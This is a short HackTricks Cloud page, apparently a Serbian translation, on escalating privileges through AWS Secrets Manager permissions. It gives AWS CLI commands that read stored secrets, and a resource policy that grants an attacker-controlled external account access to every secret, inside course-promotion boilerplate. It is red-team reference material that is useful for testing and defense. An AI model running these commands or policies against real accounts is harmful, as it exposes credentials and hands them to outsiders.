AWS - Secrets Manager Privesc
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Secrets Manager
Za više informacija o Secrets Manager proverite:
secretsmanager:GetSecretValue
Napadač sa ovom dozvolom može dobiti sačuvanu vrednost unutar secret-a u AWS Secretsmanager.
aws secretsmanager get-secret-value --secret-id <secret_name> # Get value
Potencijalni uticaj: Pristup veoma osetljivim podacima unutar AWS secrets manager servisa.
Warning
Imajte na umu da čak i sa dozvolom
secretsmanager:BatchGetSecretValue, napadač bi takođe morao imatisecretsmanager:GetSecretValueda bi preuzeo osetljive tajne.
secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)
Sa prethodnim dozvolama moguće je dodeliti pristup drugim principals/accounts (čak i eksternim) kako bi pristupili secret-u. Imajte na umu da, da bi se čitale secrets šifrovane KMS ključem, korisnik takođe mora imati pristup KMS ključu (više informacija na KMS Enum page).
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json
policy.json:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
HackTricks Cloud

